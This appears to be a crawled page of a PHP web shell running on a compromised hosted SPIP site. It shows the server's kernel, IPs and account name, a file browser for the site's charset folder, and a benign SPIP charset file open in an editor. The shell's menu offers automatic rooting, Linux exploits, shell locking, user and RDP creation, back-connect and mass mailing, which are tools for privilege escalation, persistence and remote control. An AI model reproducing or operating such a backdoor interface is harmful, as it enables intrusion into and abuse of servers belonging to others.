Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
ecrire /
charsets /
[ HOME SHELL ]
Name
Size
Permission
Action
cp1250.php
2.33
KB
-rw----r--
cp1251.php
2.33
KB
-rw----r--
cp1256.php
2.38
KB
-rw----r--
html.php
2.74
KB
-rw----r--
index.php
2
B
-rw----r--
iso-8859-1.php
2.04
KB
-rw----r--
iso-8859-15.php
1.1
KB
-rw----r--
iso-8859-6.php
1.88
KB
-rw----r--
iso-8859-9.php
1.1
KB
-rw----r--
mathml.php
42.4
KB
-rw----r--
translit.php
5.27
KB
-rw----r--
translitcomplexe.php
3.22
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : iso-8859-15.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ /** * Déclaration des correspondances entre charsets iso-8859-15 et unicode * * @author Gaetan Ryckeboer <gryckeboer@virtual-net.fr> * * @package SPIP\Core\Charsets **/ if (!defined('_ECRIRE_INC_VERSION')) { return; } load_charset('iso-8859-1'); $trans = $GLOBALS['CHARSET']['iso-8859-1']; $trans[164] = 8364; $trans[166] = 352; $trans[168] = 353; $trans[180] = 381; $trans[184] = 382; $trans[188] = 338; $trans[189] = 339; $trans[190] = 376; $GLOBALS['CHARSET']['iso-8859-15'] = $trans;
Close